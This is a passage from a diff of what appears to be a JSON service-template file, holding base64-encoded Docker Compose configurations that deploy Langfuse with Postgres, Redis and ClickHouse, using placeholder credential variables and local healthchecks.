wogIC0gJ0xBTkdGVVNFX0lOSVRfVVNFUl9OQU1FPSR7U0VSVklDRV9VU0VSX0xBTkdGVVNFfScKICAtICdMQU5HRlVTRV9JTklUX1VTRVJfUEFTU1dPUkQ9JHtTRVJWSUNFX1BBU1NXT1JEX0xBTkdGVVNFfScKc2VydmljZXM6CiAgbGFuZ2Z1c2U6CiAgICBpbWFnZTogJ2xhbmdmdXNlL2xhbmdmdXNlOjMnCiAgICBkZXBlbmRzX29uOgogICAgICBwb3N0Z3JlczoKICAgICAgICBjb25kaXRpb246IHNlcnZpY2VfaGVhbHRoeQogICAgICByZWRpczoKICAgICAgICBjb25kaXRpb246IHNlcnZpY2VfaGVhbHRoeQogICAgICBjbGlja2hvdXNlOgogICAgICAgIGNvbmRpdGlvbjogc2VydmljZV9oZWFsdGh5CiAgICBlbnZpcm9ubWVudDoKICAgICAgMDogJ05FWFRBVVRIX1VSTD0ke1NFUlZJQ0VfVVJMX0xBTkdGVVNFfScKICAgICAgMTogJ0RBVEFCQVNFX1VSTD1wb3N0Z3Jlc3FsOi8vJHtTRVJWSUNFX1VTRVJfUE9TVEdSRVN9OiR7U0VSVklDRV9QQVNTV09SRF9QT1NUR1JFU31AcG9zdGdyZXM6NTQzMi8ke1BPU1RHUkVTX0RCOi1sYW5nZnVzZS1kYn0nCiAgICAgIDI6ICdTQUxUPSR7U0VSVklDRV9QQVNTV09SRF9TQUxUfScKICAgICAgMzogJ0VOQ1JZUFRJT05fS0VZPSR7U0VSVklDRV9QQVNTV09SRF82NF9MQU5HRlVTRX0nCiAgICAgIDQ6ICdURUxFTUVUUllfRU5BQkxFRD0ke1RFTEVNRVRSWV9FTkFCTEVEOi1mYWxzZX0nCiAgICAgIDU6ICdMQU5HRlVTRV9FTkFCTEVfRVhQRVJJTUVOVEFMX0ZFQVRVUkVTPSR7TEFOR0ZVU0VfRU5BQkxFX0VYUEVSSU1FTlRBTF9GRUFUVVJFUzotZmFsc2V9JwogICAgICA2OiAnQ0xJQ0tIT1VTRV9NSUdSQVRJT05fVVJMPWNsaWNraG91c2U6Ly9jbGlja2hvdXNlOjkwMDAnCiAgICAgIDc6ICdDTElDS0hPVVNFX1VSTD1odHRwOi8vY2xpY2tob3VzZTo4MTIzJwogICAgICA4OiAnQ0xJQ0tIT1VTRV9VU0VSPSR7U0VSVklDRV9VU0VSX0NMSUNLSE9VU0V9JwogICAgICA5OiAnQ0xJQ0tIT1VTRV9QQVNTV09SRD0ke1NFUlZJQ0VfUEFTU1dPUkRfQ0xJQ0tIT1VTRX0nCiAgICAgIDEwOiBDTElDS0hPVVNFX0NMVVNURVJfRU5BQkxFRD1mYWxzZQogICAgICAxMTogJ0xBTkdGVVNFX1VTRV9BWlVSRV9CTE9CPSR7TEFOR0ZVU0VfVVNFX0FaVVJFX0JMT0I6LWZhbHNlfScKICAgICAgMTI6ICdMQU5HRlVTRV9TM19FVkVOVF9VUExPQURfQlVDS0VUPSR7TEFOR0ZVU0VfUzNfRVZFTlRfVVBMT0FEX0JVQ0tFVDotbGFuZ2Z1c2V9JwogICAgICAxMzogJ0xBTkdGVVNFX1MzX0VWRU5UX1VQTE9BRF9SRUdJT049JHtMQU5HRlVTRV9TM19FVkVOVF9VUExPQURfUkVHSU9OOi1hdXRvfScKICAgICAgMTQ6ICdMQU5HRlVTRV9TM19FVkVOVF9VUExPQURfQUNDRVNTX0tFWV9JRD0ke0xBTkdGVVNFX1MzX0VWRU5UX1VQTE9BRF9BQ0NFU1NfS0VZX0lEfScKICAgICAgMTU6ICdMQU5HRlVTRV9TM19FVkVOVF9VUExPQURfU0VDUkVUX0FDQ0VTU19LRVk9JHtMQU5HRlVTRV9TM19FVkVOVF9VUExPQURfU0VDUkVUX0FDQ0VTU19LRVl9JwogICAgICAxNjogJ0xBTkdGVVNFX1MzX0VWRU5UX1VQTE9BRF9FTkRQT0lOVD0ke0xBTkdGVVNFX1MzX0VWRU5UX1VQTE9BRF9FTkRQT0lOVH0nCiAgICAgIDE3OiAnTEFOR0ZVU0VfUzNfRVZFTlRfVVBMT0FEX0ZPUkNFX1BBVEhfU1RZTEU9JHtMQU5HRlVTRV9TM19FVkVOVF9VUExPQURfRk9SQ0VfUEFUSF9TVFlMRTotdHJ1ZX0nCiAgICAgIDE4OiAnTEFOR0ZVU0VfUzNfRVZFTlRfVVBMT0FEX1BSRUZJWD0ke0xBTkdGVVNFX1MzX0VWRU5UX1VQTE9BRF9QUkVGSVg6LWV2ZW50cy99JwogICAgICAxOTogJ0xBTkdGVVNFX1MzX01FRElBX1VQTE9BRF9CVUNLRVQ9JHtMQU5HRlVTRV9TM19NRURJQV9VUExPQURfQlVDS0VUOi1sYW5nZnVzZX0nCiAgICAgIDIwOiAnTEFOR0ZVU0VfUzNfTUVESUFfVVBMT0FEX1JFR0lPTj0ke0xBTkdGVVNFX1MzX01FRElBX1VQTE9BRF9SRUdJT046LWF1dG99JwogICAgICAyMTogJ0xBTkdGVVNFX1MzX01FRElBX1VQTE9BRF9BQ0NFU1NfS0VZX0lEPSR7TEFOR0ZVU0VfUzNfTUVESUFfVVBMT0FEX0FDQ0VTU19LRVlfSUR9JwogICAgICAyMjogJ0xBTkdGVVNFX1MzX01FRElBX1VQTE9BRF9TRUNSRVRfQUNDRVNTX0tFWT0ke0xBTkdGVVNFX1MzX01FRElBX1VQTE9BRF9TRUNSRVRfQUNDRVNTX0tFWX0nCiAgICAgIDIzOiAnTEFOR0ZVU0VfUzNfTUVESUFfVVBMT0FEX0VORFBPSU5UPSR7TEFOR0ZVU0VfUzNfTUVESUFfVVBMT0FEX0VORFBPSU5UfScKICAgICAgMjQ6ICdMQU5HRlVTRV9TM19NRURJQV9VUExPQURfRk9SQ0VfUEFUSF9TVFlMRT0ke0xBTkdGVVNFX1MzX01FRElBX1VQTE9BRF9GT1JDRV9QQVRIX1NUWUxFOi10cnVlfScKICAgICAgMjU6ICdMQU5HRlVTRV9TM19NRURJQV9VUExPQURfUFJFRklYPSR7TEFOR0ZVU0VfUzNfTUVESUFfVVBMT0FEX1BSRUZJWDotbWVkaWEvfScKICAgICAgMjY6ICdMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfRU5BQkxFRD0ke0xBTkdGVVNFX1MzX0JBVENIX0VYUE9SVF9FTkFCTEVEOi1mYWxzZX0nCiAgICAgIDI3OiAnTEFOR0ZVU0VfUzNfQkFUQ0hfRVhQT1JUX0JVQ0tFVD0ke0xBTkdGVVNFX1MzX0JBVENIX0VYUE9SVF9CVUNLRVQ6LWxhbmdmdXNlfScKICAgICAgMjg6ICdMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfUFJFRklYPSR7TEFOR0ZVU0VfUzNfQkFUQ0hfRVhQT1JUX1BSRUZJWDotZXhwb3J0cy99JwogICAgICAyOTogJ0xBTkdGVVNFX1MzX0JBVENIX0VYUE9SVF9SRUdJT049JHtMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfUkVHSU9OOi1hdXRvfScKICAgICAgMzA6ICdMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfRU5EUE9JTlQ9JHtMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfRU5EUE9JTlR9JwogICAgICAzMTogJ0xBTkdGVVNFX1MzX0JBVENIX0VYUE9SVF9FWFRFUk5BTF9FTkRQT0lOVD0ke0xBTkdGVVNFX1MzX0JBVENIX0VYUE9SVF9FWFRFUk5BTF9FTkRQT0lOVH0nCiAgICAgIDMyOiAnTEFOR0ZVU0VfUzNfQkFUQ0hfRVhQT1JUX0FDQ0VTU19LRVlfSUQ9JHtMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfQUNDRVNTX0tFWV9JRH0nCiAgICAgIDMzOiAnTEFOR0ZVU0VfUzNfQkFUQ0hfRVhQT1JUX1NFQ1JFVF9BQ0NFU1NfS0VZPSR7TEFOR0ZVU0VfUzNfQkFUQ0hfRVhQT1JUX1NFQ1JFVF9BQ0NFU1NfS0VZfScKICAgICAgMzQ6ICdMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfRk9SQ0VfUEFUSF9TVFlMRT0ke0xBTkdGVVNFX1MzX0JBVENIX0VYUE9SVF9GT1JDRV9QQVRIX1NUWUxFOi10cnVlfScKICAgICAgMzU6ICdMQU5HRlVTRV9JTkdFU1RJT05fUVVFVUVfREVMQVlfTVM9JHtMQU5HRlVTRV9JTkdFU1RJT05fUVVFVUVfREVMQVlfTVM6LTF9JwogICAgICAzNjogJ0xBTkdGVVNFX0lOR0VTVElPTl9DTElDS0hPVVNFX1dSSVRFX0lOVEVSVkFMX01TPSR7TEFOR0ZVU0VfSU5HRVNUSU9OX0NMSUNLSE9VU0VfV1JJVEVfSU5URVJWQUxfTVM6LTEwMDB9JwogICAgICAzNzogUkVESVNfSE9TVD1yZWRpcwogICAgICAzODogUkVESVNfUE9SVD02Mzc5CiAgICAgIDM5OiAnUkVESVNfQVVUSD0ke1NFUlZJQ0VfUEFTU1dPUkRfUkVESVN9JwogICAgICA0MDogJ0VNQUlMX0ZST01fQUREUkVTUz0ke0VNQUlMX0ZST01fQUREUkVTUzotYWRtaW5AZXhhbXBsZS5jb219JwogICAgICA0MTogJ1NNVFBfQ09OTkVDVElPTl9VUkw9JHtTTVRQX0NPTk5FQ1RJT05fVVJMOi19JwogICAgICA0MjogJ05FWFRBVVRIX1NFQ1JFVD0ke1NFUlZJQ0VfQkFTRTY0X05FWFRBVVRIU0VDUkVUfScKICAgICAgNDM6ICdBVVRIX0RJU0FCTEVfU0lHTlVQPSR7QVVUSF9ESVNBQkxFX1NJR05VUDotdHJ1ZX0nCiAgICAgIDQ0OiAnSE9TVE5BTUU9JHtIT1NUTkFNRTotMC4wLjAuMH0nCiAgICAgIDQ1OiAnTEFOR0ZVU0VfSU5JVF9PUkdfSUQ9JHtMQU5HRlVTRV9JTklUX09SR19JRDotbXktb3JnfScKICAgICAgNDY6ICdMQU5HRlVTRV9JTklUX09SR19OQU1FPSR7TEFOR0ZVU0VfSU5JVF9PUkdfTkFNRTotTXkgT3JnfScKICAgICAgNDc6ICdMQU5HRlVTRV9JTklUX1BST0pFQ1RfSUQ9JHtMQU5HRlVTRV9JTklUX1BST0pFQ1RfSUQ6LW15LXByb2plY3R9JwogICAgICA0ODogJ0xBTkdGVVNFX0lOSVRfUFJPSkVDVF9OQU1FPSR7TEFOR0ZVU0VfSU5JVF9QUk9KRUNUX05BTUU6LU15IFByb2plY3R9JwogICAgICA0OTogJ0xBTkdGVVNFX0lOSVRfVVNFUl9FTUFJTD0ke0xBTkdGVVNFX0lOSVRfVVNFUl9FTUFJTDotYWRtaW5AZXhhbXBsZS5jb219JwogICAgICA1MDogJ0xBTkdGVVNFX0lOSVRfVVNFUl9OQU1FPSR7U0VSVklDRV9VU0VSX0xBTkdGVVNFfScKICAgICAgNTE6ICdMQU5HRlVTRV9JTklUX1VTRVJfUEFTU1dPUkQ9JHtTRVJWSUNFX1BBU1NXT1JEX0xBTkdGVVNFfScKICAgICAgU0VSVklDRV9VUkxfTEFOR0ZVU0VfMzAwMDogJyR7U0VSVklDRV9VUkxfTEFOR0ZVU0VfMzAwMH0nCiAgICBoZWFsdGhjaGVjazoKICAgICAgdGVzdDoKICAgICAgICAtIENNRAogICAgICAgIC0gd2dldAogICAgICAgIC0gJy1xJwogICAgICAgIC0gJy0tc3BpZGVyJwogICAgICAgIC0gJ2h0dHA6Ly8xMjcuMC4wLjE6MzAwMC9hcGkvcHVibGljL2hlYWx0aCcKICAgICAgaW50ZXJ2YWw6IDVzCiAgICAgIHRpbWVvdXQ6IDVzCiAgICAgIHJldHJpZXM6IDMKICBsYW5nZnVzZS13b3JrZXI6CiAgICBpbWFnZTogJ2xhbmdmdXNlL2xhbmdmdXNlLXdvcmtlcjozJwogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gJ05FWFRBVVRIX1VSTD0ke1NFUlZJQ0VfVVJMX0xBTkdGVVNFfScKICAgICAgLSAnREFUQUJBU0VfVVJMPXBvc3RncmVzcWw6Ly8ke1NFUlZJQ0VfVVNFUl9QT1NUR1JFU306JHtTRVJWSUNFX1BBU1NXT1JEX1BPU1RHUkVTfUBwb3N0Z3Jlczo1NDMyLyR7UE9TVEdSRVNfREI6LWxhbmdmdXNlLWRifScKICAgICAgLSAnU0FMVD0ke1NFUlZJQ0VfUEFTU1dPUkRfU0FMVH0nCiAgICAgIC0gJ0VOQ1JZUFRJT05fS0VZPSR7U0VSVklDRV9QQVNTV09SRF82NF9MQU5HRlVTRX0nCiAgICAgIC0gJ1RFTEVNRVRSWV9FTkFCTEVEPSR7VEVMRU1FVFJZX0VOQUJMRUQ6LWZhbHNlfScKICAgICAgLSAnTEFOR0ZVU0VfRU5BQkxFX0VYUEVSSU1FTlRBTF9GRUFUVVJFUz0ke0xBTkdGVVNFX0VOQUJMRV9FWFBFUklNRU5UQUxfRkVBVFVSRVM6LWZhbHNlfScKICAgICAgLSAnQ0xJQ0tIT1VTRV9NSUdSQVRJT05fVVJMPWNsaWNraG91c2U6Ly9jbGlja2hvdXNlOjkwMDAnCiAgICAgIC0gJ0NMSUNLSE9VU0VfVVJMPWh0dHA6Ly9jbGlja2hvdXNlOjgxMjMnCiAgICAgIC0gJ0NMSUNLSE9VU0VfVVNFUj0ke1NFUlZJQ0VfVVNFUl9DTElDS0hPVVNFfScKICAgICAgLSAnQ0xJQ0tIT1VTRV9QQVNTV09SRD0ke1NFUlZJQ0VfUEFTU1dPUkRfQ0xJQ0tIT1VTRX0nCiAgICAgIC0gQ0xJQ0tIT1VTRV9DTFVTVEVSX0VOQUJMRUQ9ZmFsc2UKICAgICAgLSAnTEFOR0ZVU0VfVVNFX0FaVVJFX0JMT0I9JHtMQU5HRlVTRV9VU0VfQVpVUkVfQkxPQjotZmFsc2V9JwogICAgICAtICdMQU5HRlVTRV9TM19FVkVOVF9VUExPQURfQlVDS0VUPSR7TEFOR0ZVU0VfUzNfRVZFTlRfVVBMT0FEX0JVQ0tFVDotbGFuZ2Z1c2V9JwogICAgICAtICdMQU5HRlVTRV9TM19FVkVOVF9VUExPQURfUkVHSU9OPSR7TEFOR0ZVU0VfUzNfRVZFTlRfVVBMT0FEX1JFR0lPTjotYXV0b30nCiAgICAgIC0gJ0xBTkdGVVNFX1MzX0VWRU5UX1VQTE9BRF9BQ0NFU1NfS0VZX0lEPSR7TEFOR0ZVU0VfUzNfRVZFTlRfVVBMT0FEX0FDQ0VTU19LRVlfSUR9JwogICAgICAtICdMQU5HRlVTRV9TM19FVkVOVF9VUExPQURfU0VDUkVUX0FDQ0VTU19LRVk9JHtMQU5HRlVTRV9TM19FVkVOVF9VUExPQURfU0VDUkVUX0FDQ0VTU19LRVl9JwogICAgICAtICdMQU5HRlVTRV9TM19FVkVOVF9VUExPQURfRU5EUE9JTlQ9JHtMQU5HRlVTRV9TM19FVkVOVF9VUExPQURfRU5EUE9JTlR9JwogICAgICAtICdMQU5HRlVTRV9TM19FVkVOVF9VUExPQURfRk9SQ0VfUEFUSF9TVFlMRT0ke0xBTkdGVVNFX1MzX0VWRU5UX1VQTE9BRF9GT1JDRV9QQVRIX1NUWUxFOi10cnVlfScKICAgICAgLSAnTEFOR0ZVU0VfUzNfRVZFTlRfVVBMT0FEX1BSRUZJWD0ke0xBTkdGVVNFX1MzX0VWRU5UX1VQTE9BRF9QUkVGSVg6LWV2ZW50cy99JwogICAgICAtICdMQU5HRlVTRV9TM19NRURJQV9VUExPQURfQlVDS0VUPSR7TEFOR0ZVU0VfUzNfTUVESUFfVVBMT0FEX0JVQ0tFVDotbGFuZ2Z1c2V9JwogICAgICAtICdMQU5HRlVTRV9TM19NRURJQV9VUExPQURfUkVHSU9OPSR7TEFOR0ZVU0VfUzNfTUVESUFfVVBMT0FEX1JFR0lPTjotYXV0b30nCiAgICAgIC0gJ0xBTkdGVVNFX1MzX01FRElBX1VQTE9BRF9BQ0NFU1NfS0VZX0lEPSR7TEFOR0ZVU0VfUzNfTUVESUFfVVBMT0FEX0FDQ0VTU19LRVlfSUR9JwogICAgICAtICdMQU5HRlVTRV9TM19NRURJQV9VUExPQURfU0VDUkVUX0FDQ0VTU19LRVk9JHtMQU5HRlVTRV9TM19NRURJQV9VUExPQURfU0VDUkVUX0FDQ0VTU19LRVl9JwogICAgICAtICdMQU5HRlVTRV9TM19NRURJQV9VUExPQURfRU5EUE9JTlQ9JHtMQU5HRlVTRV9TM19NRURJQV9VUExPQURfRU5EUE9JTlR9JwogICAgICAtICdMQU5HRlVTRV9TM19NRURJQV9VUExPQURfRk9SQ0VfUEFUSF9TVFlMRT0ke0xBTkdGVVNFX1MzX01FRElBX1VQTE9BRF9GT1JDRV9QQVRIX1NUWUxFOi10cnVlfScKICAgICAgLSAnTEFOR0ZVU0VfUzNfTUVESUFfVVBMT0FEX1BSRUZJWD0ke0xBTkdGVVNFX1MzX01FRElBX1VQTE9BRF9QUkVGSVg6LW1lZGlhL30nCiAgICAgIC0gJ0xBTkdGVVNFX1MzX0JBVENIX0VYUE9SVF9FTkFCTEVEPSR7TEFOR0ZVU0VfUzNfQkFUQ0hfRVhQT1JUX0VOQUJMRUQ6LWZhbHNlfScKICAgICAgLSAnTEFOR0ZVU0VfUzNfQkFUQ0hfRVhQT1JUX0JVQ0tFVD0ke0xBTkdGVVNFX1MzX0JBVENIX0VYUE9SVF9CVUNLRVQ6LWxhbmdmdXNlfScKICAgICAgLSAnTEFOR0ZVU0VfUzNfQkFUQ0hfRVhQT1JUX1BSRUZJWD0ke0xBTkdGVVNFX1MzX0JBVENIX0VYUE9SVF9QUkVGSVg6LWV4cG9ydHMvfScKICAgICAgLSAnTEFOR0ZVU0VfUzNfQkFUQ0hfRVhQT1JUX1JFR0lPTj0ke0xBTkdGVVNFX1MzX0JBVENIX0VYUE9SVF9SRUdJT046LWF1dG99JwogICAgICAtICdMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfRU5EUE9JTlQ9JHtMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfRU5EUE9JTlR9JwogICAgICAtICdMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfRVhURVJOQUxfRU5EUE9JTlQ9JHtMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfRVhURVJOQUxfRU5EUE9JTlR9JwogICAgICAtICdMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfQUNDRVNTX0tFWV9JRD0ke0xBTkdGVVNFX1MzX0JBVENIX0VYUE9SVF9BQ0NFU1NfS0VZX0lEfScKICAgICAgLSAnTEFOR0ZVU0VfUzNfQkFUQ0hfRVhQT1JUX1NFQ1JFVF9BQ0NFU1NfS0VZPSR7TEFOR0ZVU0VfUzNfQkFUQ0hfRVhQT1JUX1NFQ1JFVF9BQ0NFU1NfS0VZfScKICAgICAgLSAnTEFOR0ZVU0VfUzNfQkFUQ0hfRVhQT1JUX0ZPUkNFX1BBVEhfU1RZTEU9JHtMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfRk9SQ0VfUEFUSF9TVFlMRTotdHJ1ZX0nCiAgICAgIC0gJ0xBTkdGVVNFX0lOR0VTVElPTl9RVUVVRV9ERUxBWV9NUz0ke0xBTkdGVVNFX0lOR0VTVElPTl9RVUVVRV9ERUxBWV9NUzotMX0nCiAgICAgIC0gJ0xBTkdGVVNFX0lOR0VTVElPTl9DTElDS0hPVVNFX1dSSVRFX0lOVEVSVkFMX01TPSR7TEFOR0ZVU0VfSU5HRVNUSU9OX0NMSUNLSE9VU0VfV1JJVEVfSU5URVJWQUxfTVM6LTEwMDB9JwogICAgICAtIFJFRElTX0hPU1Q9cmVkaXMKICAgICAgLSBSRURJU19QT1JUPTYzNzkKICAgICAgLSAnUkVESVNfQVVUSD0ke1NFUlZJQ0VfUEFTU1dPUkRfUkVESVN9JwogICAgICAtICdFTUFJTF9GUk9NX0FERFJFU1M9JHtFTUFJTF9GUk9NX0FERFJFU1M6LWFkbWluQGV4YW1wbGUuY29tfScKICAgICAgLSAnU01UUF9DT05ORUNUSU9OX1VSTD0ke1NNVFBfQ09OTkVDVElPTl9VUkw6LX0nCiAgICAgIC0gJ05FWFRBVVRIX1NFQ1JFVD0ke1NFUlZJQ0VfQkFTRTY0X05FWFRBVVRIU0VDUkVUfScKICAgICAgLSAnQVVUSF9ESVNBQkxFX1NJR05VUD0ke0FVVEhfRElTQUJMRV9TSUdOVVA6LXRydWV9JwogICAgICAtICdIT1NUTkFNRT0ke0hPU1ROQU1FOi0wLjAuMC4wfScKICAgICAgLSAnTEFOR0ZVU0VfSU5JVF9PUkdfSUQ9JHtMQU5HRlVTRV9JTklUX09SR19JRDotbXktb3JnfScKICAgICAgLSAnTEFOR0ZVU0VfSU5JVF9PUkdfTkFNRT0ke0xBTkdGVVNFX0lOSVRfT1JHX05BTUU6LU15IE9yZ30nCiAgICAgIC0gJ0xBTkdGVVNFX0lOSVRfUFJPSkVDVF9JRD0ke0xBTkdGVVNFX0lOSVRfUFJPSkVDVF9JRDotbXktcHJvamVjdH0nCiAgICAgIC0gJ0xBTkdGVVNFX0lOSVRfUFJPSkVDVF9OQU1FPSR7TEFOR0ZVU0VfSU5JVF9QUk9KRUNUX05BTUU6LU15IFByb2plY3R9JwogICAgICAtICdMQU5HRlVTRV9JTklUX1VTRVJfRU1BSUw9JHtMQU5HRlVTRV9JTklUX1VTRVJfRU1BSUw6LWFkbWluQGV4YW1wbGUuY29tfScKICAgICAgLSAnTEFOR0ZVU0VfSU5JVF9VU0VSX05BTUU9JHtTRVJWSUNFX1VTRVJfTEFOR0ZVU0V9JwogICAgICAtICdMQU5HRlVTRV9JTklUX1VTRVJfUEFTU1dPUkQ9JHtTRVJWSUNFX1BBU1NXT1JEX0xBTkdGVVNFfScKICAgIGRlcGVuZHNfb246CiAgICAgIHBvc3RncmVzOgogICAgICAgIGNvbmRpdGlvbjogc2VydmljZV9oZWFsdGh5CiAgICAgIHJlZGlzOgogICAgICAgIGNvbmRpdGlvbjogc2VydmljZV9oZWFsdGh5CiAgICAgIGNsaWNraG91c2U6CiAgICAgICAgY29uZGl0aW9uOiBzZXJ2aWNlX2hlYWx0aHkKICBwb3N0Z3JlczoKICAgIGltYWdlOiAncG9zdGdyZXM6MTctYWxwaW5lJwogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gJ1BPU1RHUkVTX0RCPSR7UE9TVEdSRVNfREI6LWxhbmdmdXNlLWRifScKICAgICAgLSAnUE9TVEdSRVNfUEFTU1dPUkQ9JHtTRVJWSUNFX1BBU1NXT1JEX1BPU1RHUkVTfScKICAgICAgLSAnUE9TVEdSRVNfVVNFUj0ke1NFUlZJQ0VfVVNFUl9QT1NUR1JFU30nCiAgICB2b2x1bWVzOgogICAgICAtICdsYW5nZnVzZV9wb3N0Z3Jlc19kYXRhOi92YXIvbGliL3Bvc3RncmVzcWwvZGF0YScKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OgogICAgICAgIC0gQ01ELVNIRUxMCiAgICAgICAgLSAncGdfaXNyZWFkeSAtaCBsb2NhbGhvc3QgLVUgJCR7UE9TVEdSRVNfVVNFUn0gLWQgJCR7UE9TVEdSRVNfREJ9JwogICAgICBpbnRlcnZhbDogNXMKICAgICAgdGltZW91dDogNXMKICAgICAgcmV0cmllczogMTAKICByZWRpczoKICAgIGltYWdlOiAncmVkaXM6OCcKICAgIGNvbW1hbmQ6CiAgICAgIC0gc2gKICAgICAgLSAnLWMnCiAgICAgIC0gJ3JlZGlzLXNlcnZlciAtLXJlcXVpcmVwYXNzICIkU0VSVklDRV9QQVNTV09SRF9SRURJUyInCiAgICBlbnZpcm9ubWVudDoKICAgICAgLSAnUkVESVNfUEFTU1dPUkQ9JHtTRVJWSUNFX1BBU1NXT1JEX1JFRElTfScKICAgIHZvbHVtZXM6CiAgICAgIC0gJ2xhbmdmdXNlX3JlZGlzX2RhdGE6L2RhdGEnCiAgICBoZWFsdGhjaGVjazoKICAgICAgdGVzdDoKICAgICAgICAtIENNRAogICAgICAgIC0gcmVkaXMtY2xpCiAgICAgICAgLSAnLWEnCiAgICAgICAgLSAkU0VSVklDRV9QQVNTV09SRF9SRURJUwogICAgICAgIC0gUElORwogICAgICBpbnRlcnZhbDogM3MKICAgICAgdGltZW91dDogMTBzCiAgICAgIHJldHJpZXM6IDEwCiAgY2xpY2tob3VzZToKICAgIGltYWdlOiAnY2xpY2tob3VzZS9jbGlja2hvdXNlLXNlcnZlcjpsYXRlc3QnCiAgICB1c2VyOiAnMTAxOjEwMScKICAgIGVudmlyb25tZW50OgogICAgICAtICdDTElDS0hPVVNFX0RCPSR7Q0xJQ0tIT1VTRV9EQjotZGVmYXVsdH0nCiAgICAgIC0gJ0NMSUNLSE9VU0VfVVNFUj0ke1NFUlZJQ0VfVVNFUl9DTElDS0hPVVNFfScKICAgICAgLSAnQ0xJQ0tIT1VTRV9QQVNTV09SRD0ke1NFUlZJQ0VfUEFTU1dPUkRfQ0xJQ0tIT1VTRX0nCiAgICB2b2x1bWVzOgogICAgICAtICdsYW5nZnVzZV9jbGlja2hvdXNlX2RhdGE6L3Zhci9saWIvY2xpY2tob3VzZScKICAgICAgLSAnbGFuZ2Z1c2VfY2xpY2tob3VzZV9sb2dzOi92YXIvbG9nL2NsaWNraG91c2Utc2VydmVyJwogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6ICd3Z2V0IC0tbm8tdmVyYm9zZSAtLXRyaWVzPTEgLS1zcGlkZXIgaHR0cDovL2xvY2FsaG9zdDo4MTIzL3BpbmcgfHwgZXhpdCAxJwogICAgICBpbnRlcnZhbDogNXMKICAgICAgdGltZW91dDogNXMKICAgICAgcmV0cmllczogMTAK",
+        "compose": "eC1hcHAtZW52OgogIC0gJ05FWFRBVVRIX1VSTD0ke1NFUlZJQ0VfVVJMX0xBTkdGVVNFfScKICAtICdEQVRBQkFTRV9VUkw9cG9zdGdyZXNxbDovLyR7U0VSVklDRV9VU0VSX1BPU1RHUkVTfToke1NFUlZJQ0VfUEFTU1dPUkRfUE9TVEdSRVN9QHBvc3RncmVzOjU0MzIvJHtQT1NUR1JFU19EQjotbGFuZ2Z1c2UtZGJ9JwogIC0gJ1NBTFQ9JHtTRVJWSUNFX1BBU1NXT1JEX1NBTFR9JwogIC0gJ0VOQ1JZUFRJT05fS0VZPSR7U0VSVklDRV9QQVNTV09SRF82NF9MQU5HRlVTRX0nCiAgLSAnVEVMRU1FVFJZX0VOQUJMRUQ9JHtURUxFTUVUUllfRU5BQkxFRDotZmFsc2V9JwogIC0gJ0xBTkdGVVNFX0VOQUJMRV9FWFBFUklNRU5UQUxfRkVBVFVSRVM9JHtMQU5HRlVTRV9FTkFCTEVfRVhQRVJJTUVOVEFMX0ZFQVRVUkVTOi1mYWxzZX0nCiAgLSAnQ0xJQ0tIT1VTRV9NSUdSQVRJT05fVVJMPWNsaWNraG91c2U6Ly9jbGlja2hvdXNlOjkwMDAnCiAgLSAnQ0xJQ0tIT1VTRV9VUkw9aHR0cDovL2NsaWNraG91c2U6ODEyMycKICAtICdDTElDS0hPVVNFX1VTRVI9JHtTRVJWSUNFX1VTRVJfQ0xJQ0tIT1VTRX0nCiAgLSAnQ0xJQ0tIT1VTRV9QQVNTV09SRD0ke1NFUlZJQ0VfUEFTU1dPUkRfQ0xJQ0tIT1VTRX0nCiAgLSBDTElDS0hPVVNFX0NMVVNURVJfRU5BQkxFRD1mYWxzZQogIC0gJ0xBTkdGVVNFX1VTRV9BWlVSRV9CTE9CPSR7TEFOR0ZVU0VfVVNFX0FaVVJFX0JMT0I6LWZhbHNlfScKICAtICdMQU5HRlVTRV9TM19FVkVOVF9VUExPQURfQlVDS0VUPSR7TEFOR0ZVU0VfUzNfRVZFTlRfVVBMT0FEX0JVQ0tFVDotbGFuZ2Z1c2V9JwogIC0gJ0xBTkdGVVNFX1MzX0VWRU5UX1VQTE9BRF9SRUdJT049JHtMQU5HRlVTRV9TM19FVkVOVF9VUExPQURfUkVHSU9OOi1hdXRvfScKICAtICdMQU5HRlVTRV9TM19FVkVOVF9VUExPQURfQUNDRVNTX0tFWV9JRD0ke0xBTkdGVVNFX1MzX0VWRU5UX1VQTE9BRF9BQ0NFU1NfS0VZX0lEfScKICAtICdMQU5HRlVTRV9TM19FVkVOVF9VUExPQURfU0VDUkVUX0FDQ0VTU19LRVk9JHtMQU5HRlVTRV9TM19FVkVOVF9VUExPQURfU0VDUkVUX0FDQ0VTU19LRVl9JwogIC0gJ0xBTkdGVVNFX1MzX0VWRU5UX1VQTE9BRF9FTkRQT0lOVD0ke0xBTkdGVVNFX1MzX0VWRU5UX1VQTE9BRF9FTkRQT0lOVH0nCiAgLSAnTEFOR0ZVU0VfUzNfRVZFTlRfVVBMT0FEX0ZPUkNFX1BBVEhfU1RZTEU9JHtMQU5HRlVTRV9TM19FVkVOVF9VUExPQURfRk9SQ0VfUEFUSF9TVFlMRTotdHJ1ZX0nCiAgLSAnTEFOR0ZVU0VfUzNfRVZFTlRfVVBMT0FEX1BSRUZJWD0ke0xBTkdGVVNFX1MzX0VWRU5UX1VQTE9BRF9QUkVGSVg6LWV2ZW50cy99JwogIC0gJ0xBTkdGVVNFX1MzX01FRElBX1VQTE9BRF9CVUNLRVQ9JHtMQU5HRlVTRV9TM19NRURJQV9VUExPQURfQlVDS0VUOi1sYW5nZnVzZX0nCiAgLSAnTEFOR0ZVU0VfUzNfTUVESUFfVVBMT0FEX1JFR0lPTj0ke0xBTkdGVVNFX1MzX01FRElBX1VQTE9BRF9SRUdJT046LWF1dG99JwogIC0gJ0xBTkdGVVNFX1MzX01FRElBX1VQTE9BRF9BQ0NFU1NfS0VZ